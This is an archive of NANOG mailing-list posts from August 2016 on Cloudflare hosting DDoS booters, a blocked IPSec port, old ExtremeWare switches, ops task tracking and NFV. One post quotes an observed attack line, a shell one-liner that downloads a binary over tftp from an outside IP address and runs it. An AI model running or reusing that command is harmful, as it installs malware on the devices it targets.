From baldur.norddahl at gmail.com Mon Aug 1 10:20:10 2016 From: baldur.norddahl at gmail.com (Baldur Norddahl) Date: Mon, 1 Aug 2016 12:20:10 +0200 Subject: Cloudflare, dirty networks and politricks In-Reply-To: References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com> <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com> <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com> <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com> <20160728171708.GA87119@e-fensive.net> <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com> <20160729120805.GA5869@gsp.org> <22427.45091.239632.929005@gargle.gargle.HOWL> <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com> <22429.328.693730.411532@gargle.gargle.HOWL> Message-ID: <579F225A.4010307@gmail.com> On 2016-07-31 05:46, Randy Bush wrote: >> This is silly. Anyone is of course allowed to deny service to parties >> involved in obvious criminal activity. > so block cloudflare from your network and go back to work already. > > randy What is that supposed to accomplish? Cloudflare will still be helping selling DDoS attacks on my network. No it is not the same as asking Cloudflare to do the sensible thing: Cloudflare profits on DDoS attacks. We are the victims. Cloudflare can dump just the obvious criminal customers. The ones they got abuse complaints about so they know which ones to look at. If we block Cloudflare there will be collateral damage to all legit Cloudflare customers and our own customers using services from legit Cloudflare customers. Asking me to do anything at all is like telling the rape victim to take care of the problem herself. Cloudflare is the wrongdoing party here, not us. Blocking Cloudflare does not stop the attacks. If Cloudflare stops offering protection service to booters, those sites will find it very hard to find alternatives. There is a reason they all are using Cloudflare. Thus if Cloudflare boots the booters we will very likely see a decrease in attacks. My preferred solution is that management of Cloudflare decides to make their company a honest outfit again. Failing that, I would like law enforcement to coerce them into becoming a honest outfit. Failing that, I would want a judge in a civil lawsuit coerce them. I do believe that most of us on this list have cause to do that civil lawsuit, especially if it was done as a class action. But I just own a small company that is not even based in the US, so I am not going to be the hero that funds it. Instead I will do what I can to warn everyone off this company. Regards, Baldur From randy at psg.com Mon Aug 1 11:33:07 2016 From: randy at psg.com (Randy Bush) Date: Mon, 01 Aug 2016 20:33:07 +0900 Subject: Cloudflare, dirty networks and politricks In-Reply-To: <579F225A.4010307@gmail.com> References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com> <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com> <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com> <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com> <20160728171708.GA87119@e-fensive.net> <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com> <20160729120805.GA5869@gsp.org> <22427.45091.239632.929005@gargle.gargle.HOWL> <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com> <22429.328.693730.411532@gargle.gargle.HOWL> <579F225A.4010307@gmail.com> Message-ID: >> so block cloudflare from your network and go back to work already. > > What is that supposed to accomplish? Cloudflare will still be helping > selling DDoS attacks on my network. > > No it is not the same as asking Cloudflare to do the sensible thing: and how is that working out for you? all that is happening is the subject that won't die is being a dos on this list (yes, including this response) randy From ahebert at pubnix.net Mon Aug 1 13:41:11 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Mon, 1 Aug 2016 09:41:11 -0400 Subject: Cloudflare, dirty networks and politricks In-Reply-To: References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com> <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com> <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com> <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com> <20160728171708.GA87119@e-fensive.net> <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com> <20160729120805.GA5869@gsp.org> <22427.45091.239632.929005@gargle.gargle.HOWL> <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com> <22429.328.693730.411532@gargle.gargle.HOWL> <579F225A.4010307@gmail.com> Message-ID: <369747a4-00f9-966a-0893-6f91779e2715@pubnix.net> While on that subject, ( And by pure coincidence ) Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe) using OVH as a payload distribution AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh Obviously that host is not accessible at the moment. (GG OVH?) I'm suspecting that the CC used to create that VM got declined on the 1st, which is often the case for payload distribution. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/01/16 07:33, Randy Bush wrote: >>> so block cloudflare from your network and go back to work already. >> What is that supposed to accomplish? Cloudflare will still be helping >> selling DDoS attacks on my network. >> >> No it is not the same as asking Cloudflare to do the sensible thing: > and how is that working out for you? > > all that is happening is the subject that won't die is being a dos on > this list (yes, including this response) > > randy > From Edwin.Mallette at charter.com Mon Aug 1 13:54:03 2016 From: Edwin.Mallette at charter.com (Mallette, Edwin J) Date: Mon, 1 Aug 2016 13:54:03 +0000 Subject: Brighthouse Orlando Port blocking ISAKMP Message-ID: Hi Erik, We definitely do not filter UDP500 across our network. I?m going to reach out to you directly to see if I can help figure out what?s going on. Cheers! Ed On 7/30/16, 11:38 PM, "NANOG on behalf of Eric C. Miller" wrote: >Hello! > >Subject says it all!!! I cannot open any IPSec tunnels, because UDP 500 >is not making it through to my Brighthouse connection. I've tried from >Level3, Cogent, and AT&T. Are there any Brighthouse engineers on that >would help me shed some light on this? > >Thank you, > >Eric From freedomshield2005 at gmail.com Mon Aug 1 12:10:36 2016 From: freedomshield2005 at gmail.com (John) Date: Mon, 1 Aug 2016 15:10:36 +0300 Subject: Cloudflare, dirty networks and politricks Message-ID: On 2016-08-01 13:20, Baldur Norddahl wrote: > On 2016-07-31 05:46, Randy Bush wrote: >>> This is silly. Anyone is of course allowed to deny service to parties >>> involved in obvious criminal activity. >> so block cloudflare from your network and go back to work already. >> >> randy .... > I do believe that most of us on this list have cause to do that civil > lawsuit, especially if it was done as a class action. But I just own a > small company that is not even based in the US, so I am not going to > be the hero that funds it. Instead I will do what I can to warn > everyone off this company. > > Regards, > > Baldur I think even you will win in court Russian government since a while implemented country-wide blocklist. It is transparent and available online, and there is a lot of cloudflare ip's (http://reestr.rublacklist.net/api/ips). First i thought, again Putin's regime crack on freedom, but after viewing specific cloudflare subnet as example ( http://reestr.rublacklist.net/search/1?q=104.16.) i can say, major part of websites are online gambling, and many of them have court decisions. There is also some ISIL propaganda, questionable nudes of underage (they pretend to be art), drug dealers forums (all in russian language) and etc. As far as i know russians send first abuse letter, and if such content is not removed in reasonable terms - they block resource on "russian firewall". And i believe ignorance hurts cloudflare business in Russia, but do they care? I may understand much more proper position of google, for example if they receive court order from Russia - they block this particular content in Russia only. But they wont back on their position on free speech. And they are able to clearly draw a line between free speech and criminals. Ok, let's say on booters no court decision and it is gray area. But providing connectivity for terrorists propaganda or very questionable content - beyond my understanding. Sure i leave chance that they didn't received notification from officials, but at least now they are aware about this. From nanog at ics-il.net Mon Aug 1 22:39:39 2016 From: nanog at ics-il.net (Mike Hammett) Date: Mon, 1 Aug 2016 17:39:39 -0500 (CDT) Subject: ExtremeWare In-Reply-To: <1238017378.12022.1470091104816.JavaMail.mhammett@ThunderFuck> Message-ID: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck> Can those that ran switches with ExtremeWare on them remember that far back? I've got a Summit 400t-48 and I can't seem figure out how to get DDM information from the SFP. Did they have that ability? ----- Mike Hammett Intelligent Computing Solutions http://www.ics-il.com Midwest-IX http://www.midwest-ix.com From paul at prt.org Tue Aug 2 06:17:36 2016 From: paul at prt.org (Paul Thornton) Date: Tue, 2 Aug 2016 07:17:36 +0100 Subject: ExtremeWare In-Reply-To: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck> References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck> Message-ID: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org> Hi On 01/08/2016 23:39, Mike Hammett wrote: > Can those that ran switches with ExtremeWare on them remember that far back? Just about. > > I've got a Summit 400t-48 and I can't seem figure out how to get DDM information from the SFP. Did they have that ability? They probably do, but only in the deep runic debug mode (nofeep) which was never a recommended practice unless you had the TAC on the 'phone. I have a couple of old 48si boxes hanging around in the lab LAN - Extremeware 7.8.4 certainly doesn't understand "show port n transceiver". I think this is XOS only. Paul. From ryanczak at gmail.com Tue Aug 2 13:59:01 2016 From: ryanczak at gmail.com (Matt Ryanczak) Date: Tue, 02 Aug 2016 13:59:01 +0000 Subject: Operations task management software? In-Reply-To: <712E5359-5217-41AA-A779-F13DCE597537@dino.hostasaurus.com> References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com> <712E5359-5217-41AA-A779-F13DCE597537@dino.hostasaurus.com> Message-ID: Jira works well as a task tracking system for ops. Customizable work flows, decent integration with ldap, etc. Also good for tracking software projects. Having both software and ops tasks in one place has many benefits. On Wed, Jul 27, 2016, 16:28 David Hubbard wrote: > Full automation is planned but does not eliminate the need for the > software. Zero human auditing of fully automated processes and data > collection are not acceptable to various certifying entities, the relevant > auditors, the inevitably involved lawyers, and won?t pick up on bad data, > like a bad thermometer or snmp counter that says a CRAC is 65 degrees when > it?s really 90. So I?m still going to need a management solution to the > issue whether it?s to tell someone to do the work or to tell someone to > check the automated work. > > David > > On 7/27/16, 7:19 PM, "Lee" wrote: > > On 7/27/16, David Hubbard wrote: > > Hi all, curious if anyone has recommendations on software that helps > manage > > routine duties assigned to operations staff? > > Have computers do the routine scut work - not people. > > > For example, let?s say we have a P&P that says someone from the > netops group > > must check that Rancid is successfully backing up all router configs > > bi-weekly. > > You've got the source code for rancid, so change rancid-run to do > something like > LOGFILE=$LOGDIR/$GROUP.`date +%Y%m%d.%H%M%S`; export LOGFILE > change the > ) >$LOGDIR/$GROUP.`date +%Y%m%d.%H%M%S` 2>&1 > to > ) >$LOGFILE 2>&1 > > and then in control_rancid do something like > grep "clogin error:" $LOGFILE | sort | uniq -c >$TMP.fail > if [ -s $TMP.fail ]; then > # got some output, mail the report > ... > > Do the same type thing for checking on > > backup failures, backup internet circuit status, out of band > interfaces, etc. > > Automate the checks, put the scripts in crontab & mail out an > "OhNoes!" or "all clear" msg at the end. At which point you're left > with the problem of making sure the managers are looking at the emails > & making sure whatever problems are found actually get fixed :) > > Regards, > Lee > > > From Jeroen.Wunnink at hibernianetworks.com Tue Aug 2 14:07:09 2016 From: Jeroen.Wunnink at hibernianetworks.com (Jeroen Wunnink) Date: Tue, 2 Aug 2016 14:07:09 +0000 Subject: Operations task management software? In-Reply-To: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com> References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com> Message-ID: <77561D93-70EF-48B6-A437-ADBBE84D0C9F@hibernianetworks.com> We use redmine, combined with scripts that call it?s API to create automated tickets/tasks that NOC or engineers need to attend to. Has email notifications, wiki, documents, files, code repo, calendar, customisable fields all built in. ? Jeroen Wunnink IP Engineering Manager Hibernia Networks - Amsterdam Office Main numbers (Ext: 1011): USA +1.908.516.4200 | Canada +1.902.442.1780 Ireland +353.1.867.3600 | UK +44.1704.322.300 | Netherlands +31.208.200.622 24/7/365 IP NOC Phone: +31.20.82.00.623 Jeroen.Wunnink at hibernianetworks.com www.hibernianetworks.com On 27/07/16 20:16, "NANOG on behalf of David Hubbard" wrote: >Hi all, curious if anyone has recommendations on software that helps manage routine duties assigned to operations staff? > >For example, let?s say we have a P&P that says someone from the netops group must check that Rancid is successfully backing up all router configs bi-weekly. Ideally, it would send an email reminder to this pre-defined group of people saying hey, it?s Monday, someone needs to check this and come acknowledge the task as having been completed. If that doesn?t occur, pre-defined manager X is notified on Tuesday. If manager X doesn?t get someone to complete the task, director Y is notified, so on and so forth. Then, perhaps periodically it emails manager X anyway and says hey, it?s been three months, you need to audit netops to ensure they?re actually doing the Rancid audit and not just checking that it was done. This could be applied to the staff who check on backup failures, backup internet circuit status, out of band interfaces, etc. > >A data center I looked at recently had QR code stickers on all of their infrastructure stuff and there were staff assigned to check and log certain displayed values each day. The software would at least ensure they actually visited the equipment by requiring they scan the relevant QR code when in front of it. So I figure something that does what I?m looking for properly already exists. > >Thanks, > >David > This e-mail and any attachments thereto is intended only for use by the addressee(s) named herein and may be proprietary and/or legally privileged. If you are not the intended recipient of this e-mail, you are hereby notified that any dissemination, distribution or copying of this email, and any attachments thereto, without the prior written permission of the sender is strictly prohibited. If you receive this e-mail in error, please immediately telephone or e-mail the sender and permanently delete the original copy and any copy of this e-mail, and any printout thereof. All documents, contracts or agreements referred or attached to this e-mail are SUBJECT TO CONTRACT. The contents of an attachment to this e-mail may contain software viruses that could damage your own computer system. While Hibernia Networks has taken every reasonable precaution to minimize this risk, we cannot accept liability for any damage that you sustain as a result of software viruses. You should carry out your own virus checks before opening any attachment. From rjacobs at pslightwave.com Tue Aug 2 14:40:36 2016 From: rjacobs at pslightwave.com (Robert Jacobs) Date: Tue, 2 Aug 2016 14:40:36 +0000 Subject: ExtremeWare In-Reply-To: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org> References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck> <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org> Message-ID: To old.... feature was not supported on that code rev or model. Robert Jacobs | Network Director/Architect Direct:? 832-615-7742 Main:?? 832-615-8000 Fax:??? 713-510-1650 5959 Corporate Dr. Suite 3300; Houston, TX 77036 A Certified Woman-Owned Business 24x7x365 Customer? Support: 832-615-8000 | support at pslightwave.com This electronic message contains information from Phonoscope Lightwave which may be privileged and confidential. The information is intended to be for the use of individual(s) or entity named above. If you are not the intended recipient, any disclosure, copying, distribution or use of the contents of this information is prohibited. If you have received this electronic message in error, please notify me by telephone or e-mail immediately. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Paul Thornton Sent: Tuesday, August 2, 2016 1:18 AM To: nanog at nanog.org Subject: Re: ExtremeWare Hi On 01/08/2016 23:39, Mike Hammett wrote: > Can those that ran switches with ExtremeWare on them remember that far back? Just about. > > I've got a Summit 400t-48 and I can't seem figure out how to get DDM information from the SFP. Did they have that ability? They probably do, but only in the deep runic debug mode (nofeep) which was never a recommended practice unless you had the TAC on the 'phone. I have a couple of old 48si boxes hanging around in the lab LAN - Extremeware 7.8.4 certainly doesn't understand "show port n transceiver". I think this is XOS only. Paul. From saku at ytti.fi Tue Aug 2 16:31:24 2016 From: saku at ytti.fi (Saku Ytti) Date: Tue, 2 Aug 2016 19:31:24 +0300 Subject: Operations task management software? In-Reply-To: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com> References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com> Message-ID: On 27 July 2016 at 21:16, David Hubbard wrote: Hey, > Hi all, curious if anyone has recommendations on software that helps manage routine duties assigned to operations staff? I'd solicit opinions as well. There are few features I'd like to see: 1) ability to create parent+child, if all childs are closed, parent closes if parent is closed, childs close 2) ability to create dependencies, perhaps I have some design change I want to make, but it can't be done until large bunch of operational work is done, I could create tickets for ops, and then create ticket for myself, and make it depend on the the ops ticket being solved. It wouldn't be seen in my work queue, until all solve-dependencies are solved. 3) user (non-admin) access to API, if the UI is bad, like it probably is for my very small subnet of things I need, I could create own CLI UI addressing solely the use cases that are relevant to me, in an streamlined, low-time-cost UI to me. In dream scenario shipping webUI is dog-fooding documented API, so anything I can do there, I can do from my own CLI UI. There are probably others, but those are the main things I think I need. -- ++ytti From ahebert at pubnix.net Tue Aug 2 18:08:29 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Tue, 2 Aug 2016 14:08:29 -0400 Subject: ExtremeWare In-Reply-To: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org> References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck> <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org> Message-ID: Hey, Those are still current here =D But yes 12.x or 15.x XOS has support, but only for official EN optics. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/02/16 02:17, Paul Thornton wrote: > Hi > > On 01/08/2016 23:39, Mike Hammett wrote: >> Can those that ran switches with ExtremeWare on them remember that >> far back? > > Just about. >> >> I've got a Summit 400t-48 and I can't seem figure out how to get DDM >> information from the SFP. Did they have that ability? > They probably do, but only in the deep runic debug mode (nofeep) which > was never a recommended practice unless you had the TAC on the > 'phone. I have a couple of old 48si boxes hanging around in the lab > LAN - Extremeware 7.8.4 certainly doesn't understand "show port n > transceiver". I think this is XOS only. > > Paul. > > From dmburgess at linktechs.net Tue Aug 2 19:24:51 2016 From: dmburgess at linktechs.net (Dennis Burgess) Date: Tue, 2 Aug 2016 19:24:51 +0000 Subject: CenturyLink Executive Message-ID: I have been working on a circuit outage since Monday morning, my tickets are closed, can't get ahold of anyone, no phone calls, problem not resolved, anyone from CenturyLink Executive Team could give me a call or e-mail to see if we can get these issues solved. [DennisBurgessSignature] www.linktechs.net - 314-735-0270 x103 - dmburgess at linktechs.net From dhubbard at dino.hostasaurus.com Tue Aug 2 20:47:35 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Tue, 2 Aug 2016 20:47:35 +0000 Subject: Level3 (3356) to outlook.office365.com via v6? Message-ID: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com> Curious if anyone else is having issues reaching outlook.office365.com via ipv6 over Level 3? Our customers have begun reporting failures checking email, and in the ones who have had this issue, are using the mail server name outlook.office365.com and are on v6. Traceroute6 shows the traffic dying shortly into Level 3 land at 2001:1900:4:1::3d1 which is likely a Tampa-area router. Thanks, David From Sam at SanDiegoBroadband.com Tue Aug 2 22:01:32 2016 From: Sam at SanDiegoBroadband.com (Sam Norris) Date: Tue, 2 Aug 2016 15:01:32 -0700 Subject: Level3 (3356) to outlook.office365.com via v6? In-Reply-To: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com> References: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com> Message-ID: <0cd601d1ed09$6fbc8750$4f3595f0$@SanDiegoBroadband.com> We have 2 customers complaining about this in the past 3 days - both using IPv4 only. Glad to see this because maybe it?s a larger problem outside of our network. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of David Hubbard > Sent: Tuesday, August 02, 2016 1:48 PM > To: nanog at nanog.org > Subject: Level3 (3356) to outlook.office365.com via v6? > > Curious if anyone else is having issues reaching outlook.office365.com via ipv6 > over Level 3? Our customers have begun reporting failures checking email, and in > the ones who have had this issue, are using the mail server name > outlook.office365.com and are on v6. Traceroute6 shows the traffic dying shortly > into Level 3 land at 2001:1900:4:1::3d1 which is likely a Tampa-area router. > > Thanks, > > David > > --- This email has been checked for viruses by Avast antivirus software. https://www.avast.com/antivirus From matt at kahlerlarson.org Wed Aug 3 01:21:28 2016 From: matt at kahlerlarson.org (Matt Larson) Date: Tue, 2 Aug 2016 19:21:28 -0600 Subject: Verizon Wireless contact Message-ID: Could someone from Verizon Wireless please contact me off-list? Thanks, Matt -- Matt Larson VP of Research Office of the CTO, ICANN +1 240 459-9562 (mobile) From mel at beckman.org Wed Aug 3 01:28:08 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 3 Aug 2016 01:28:08 +0000 Subject: Frontier FlashWave Support contact Message-ID: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org> Can someone from Frontier provide a CO contact for customer-prem FlashWave units? We have several in alarm, although otherwise functional, but Frontier front line support seems unable to open tickets on this gear, since it's not apparently considered CPE by Frontier. -mel beckman From karim.adel at gmail.com Wed Aug 3 01:50:16 2016 From: karim.adel at gmail.com (Kasper Adel) Date: Tue, 2 Aug 2016 18:50:16 -0700 Subject: NFV Solution Evaluation Methodology Message-ID: Hi, I am interested in hearing the approach and thought-process that senior people on NANOG are following when presented with an NFV solution. Assuming that the exercise at hand is to consider NFV for future expansions of Firewalls and L3VPNs or stay with the existing model of what is called PNF (physical network function)...i.e : classic routers and FWs. There are a lot of factors to consider and Vendors will typically give their biased opinion, so i'm trying to get my head out of their game, to be able to think agnostically about the whole thing. 1) Product and Service/Support Cost. 2) Operation Complexity/Learning Curve. (open source products included). 3) X Factors (Those that are never listed but do bite in the back) : Quality, Integration with Classic, Migration, Usability...etc The main goal behind us exploring NFV is the promised cost-saving, so a good method to be able to do the math of whether NFV will save opex/capex or NOT is definitely needed here and i'm trying to gather guidelines from the list. I think its easier to keep this post high-level, and later dig deeper. Cheers, K From cb.list6 at gmail.com Wed Aug 3 02:08:15 2016 From: cb.list6 at gmail.com (Ca By) Date: Tue, 2 Aug 2016 19:08:15 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Tuesday, August 2, 2016, Kasper Adel wrote: > Hi, > > I am interested in hearing the approach and thought-process that senior > people on NANOG are following when presented with an NFV solution. Assuming > that the exercise at hand is to consider NFV for future expansions of > Firewalls and L3VPNs or stay with the existing model of what is called PNF > (physical network function)...i.e : classic routers and FWs. > > There are a lot of factors to consider and Vendors will typically give > their biased opinion, so i'm trying to get my head out of their game, to be > able to think agnostically about the whole thing. > > 1) Product and Service/Support Cost. > 2) Operation Complexity/Learning Curve. (open source products included). > 3) X Factors (Those that are never listed but do bite in the back) : > Quality, Integration with Classic, Migration, Usability...etc > > The main goal behind us exploring NFV is the promised cost-saving, so a > good method to be able to do the math of whether NFV will save opex/capex > or NOT is definitely needed here and i'm trying to gather guidelines from > the list. > > I think its easier to keep this post high-level, and later dig deeper. > > Cheers, > K > Sorry , just a junior person here. Maybe a sr can pipe up later. But my business cases and associated data points show NFV like SDN are snake oil. If you know your requirements, buy / implement the best value solution. You can call it NFV if that makes you feel better. There is nothing new under the sun. Running DNS or bgp on linux cough... is not a new thing. If you are google or fb and have the best software engineers in the world, you can express your requirements to your dev team and they can just build it. And support it. But i see a lot of folks paying premium for sdn/nfv and tooting their own horns ... but the needle is not moving Buyer beware. Ymmv. CB Ps. Also, simpler > complex. Lots of $ in this statement. From eric.kuhnke at gmail.com Wed Aug 3 02:16:04 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 2 Aug 2016 19:16:04 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying through the air, you should move everything to the Cloud (tm). Sometimes people forget that *somebody* needs to run the bare metal and OSI layer 1 things that physically make up the cloud. On Tue, Aug 2, 2016 at 7:08 PM, Ca By wrote: > On Tuesday, August 2, 2016, Kasper Adel wrote: > > > Hi, > > > > I am interested in hearing the approach and thought-process that senior > > people on NANOG are following when presented with an NFV solution. > Assuming > > that the exercise at hand is to consider NFV for future expansions of > > Firewalls and L3VPNs or stay with the existing model of what is called > PNF > > (physical network function)...i.e : classic routers and FWs. > > > > There are a lot of factors to consider and Vendors will typically give > > their biased opinion, so i'm trying to get my head out of their game, to > be > > able to think agnostically about the whole thing. > > > > 1) Product and Service/Support Cost. > > 2) Operation Complexity/Learning Curve. (open source products included). > > 3) X Factors (Those that are never listed but do bite in the back) : > > Quality, Integration with Classic, Migration, Usability...etc > > > > The main goal behind us exploring NFV is the promised cost-saving, so a > > good method to be able to do the math of whether NFV will save opex/capex > > or NOT is definitely needed here and i'm trying to gather guidelines from > > the list. > > > > I think its easier to keep this post high-level, and later dig deeper. > > > > Cheers, > > K > > > > Sorry , just a junior person here. Maybe a sr can pipe up later. > > But my business cases and associated data points show NFV like SDN > are snake oil. > > If you know your requirements, buy / implement the best value solution. You > can call it NFV if that makes you feel better. > > There is nothing new under the sun. Running DNS or bgp on linux cough... is > not a new thing. > > If you are google or fb and have the best software engineers in the world, > you can express your requirements to your dev team and they can just build > it. And support it. > > But i see a lot of folks paying premium for sdn/nfv and tooting their own > horns ... but the needle is not moving > > Buyer beware. Ymmv. > > CB > > Ps. Also, simpler > complex. Lots of $ in this statement. > From morrowc.lists at gmail.com Wed Aug 3 03:07:42 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 2 Aug 2016 23:07:42 -0400 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Tue, Aug 2, 2016 at 10:16 PM, Eric Kuhnke wrote: > But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying > through the air, you should move everything to the Cloud (tm). > > Sometimes people forget that *somebody* needs to run the bare metal and OSI > layer 1 things that physically make up the cloud. > > mr by isn't wrong there are lots of ... over sold things. but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built appliance garbage that can't scale in a cost effective manner and replacing it with some software solution on 'many' commodity unix-like-hosts that can scale horizontally. -chris (just a chemical engineer... really) From Valdis.Kletnieks at vt.edu Wed Aug 3 03:15:44 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Aug 2016 23:15:44 -0400 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: <194341.1470194144@turing-police.cc.vt.edu> On Tue, 02 Aug 2016 19:16:04 -0700, Eric Kuhnke said: > But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying > through the air, you should move everything to the Cloud (tm). Running the stuff you need to keep your own network running on the cloud? That's the sort of thing I encourage my competitors to do. :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 848 bytes Desc: not available URL: From thegameiam at yahoo.com Wed Aug 3 03:28:10 2016 From: thegameiam at yahoo.com (David Barak) Date: Tue, 2 Aug 2016 20:28:10 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: Simpler > complex *sometimes*. It turns out that sometimes the complexity is worth it (eg https://youtu.be/-iiXsbrEv3U ). Perhaps "as simple as possible, by no simpler" would be reasonable? David Barak Sent from mobile device, please excuse autocorrection artifacts > On Aug 2, 2016, at 7:08 PM, Ca By wrote > CB > > Ps. Also, simpler > complex. Lots of $ in this statement. From eric at ericheather.com Wed Aug 3 03:38:39 2016 From: eric at ericheather.com (Eric C. Miller) Date: Wed, 3 Aug 2016 03:38:39 +0000 Subject: Brighthouse Orlando Port blocking ISAKMP In-Reply-To: References: Message-ID: All is well, now. It appears that it may have been on XO's network. My crypto tunnel between AT&T and BH crossed XO, and asymmetric routing from my office network had Cogent and XO outgoing, and Level3 on the return. If I forced my office connection to use Level3 for the outbound, the tunnel established immediately. Brighthouse's phone support was a grade F, by the way. Their phone support had me yanked around for an hour, before they finally consulted with Tier3. After relaying the response, which was simply, "BH doesn't filter customer traffic - It must be on your side," I asked to speak with them directly. The person I was speaking to proceeded to tell me that Tier-3 had just closed, and that they would have to call me back. It was 48 hours before I received a call back. Grr. Eric Miller, CCNP Network Engineering Consultant -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mallette, Edwin J Sent: Monday, August 1, 2016 9:54 AM To: NANOG Subject: Re: Brighthouse Orlando Port blocking ISAKMP Hi Erik, We definitely do not filter UDP500 across our network. I?m going to reach out to you directly to see if I can help figure out what?s going on. Cheers! Ed On 7/30/16, 11:38 PM, "NANOG on behalf of Eric C. Miller" wrote: >Hello! > >Subject says it all!!! I cannot open any IPSec tunnels, because UDP 500 >is not making it through to my Brighthouse connection. I've tried from >Level3, Cogent, and AT&T. Are there any Brighthouse engineers on that >would help me shed some light on this? > >Thank you, > >Eric From mel at beckman.org Wed Aug 3 04:40:16 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 3 Aug 2016 04:40:16 +0000 Subject: Frontier FlashWave Support contact In-Reply-To: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org> References: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org> Message-ID: Thank you Frontier for the very rapid out-of-band contact! -mel beckman > On Aug 2, 2016, at 6:28 PM, Mel Beckman wrote: > > Can someone from Frontier provide a CO contact for customer-prem FlashWave units? We have several in alarm, although otherwise functional, but Frontier front line support seems unable to open tickets on this gear, since it's not apparently considered CPE by Frontier. > > -mel beckman From randy at psg.com Wed Aug 3 07:56:34 2016 From: randy at psg.com (Randy Bush) Date: Wed, 03 Aug 2016 16:56:34 +0900 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built > appliance garbage that can't scale in a cost effective manner and > replacing it with some software solution on 'many' commodity > unix-like-hosts that can scale horizontally. my main worry about nfv is when they need more forwarding horsepower than the household appliance has, and the data plan is is moved out of the control plane and they are not congruent. we've had too many lessons debugging this situation (datakit, atm, ...). beyond that, i am not sure i see that much difference whether it's a YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, supported communities, ... randy From cb.list6 at gmail.com Wed Aug 3 12:20:36 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 05:20:36 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Wednesday, August 3, 2016, Randy Bush wrote: > > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built > > appliance garbage that can't scale in a cost effective manner and > > replacing it with some software solution on 'many' commodity > > unix-like-hosts that can scale horizontally. > > my main worry about nfv is when they need more forwarding horsepower > than the household appliance has, and the data plan is is moved > out of the control plane and they are not congruent. we've had too many > lessons debugging this situation (datakit, atm, ...). > > YES! This 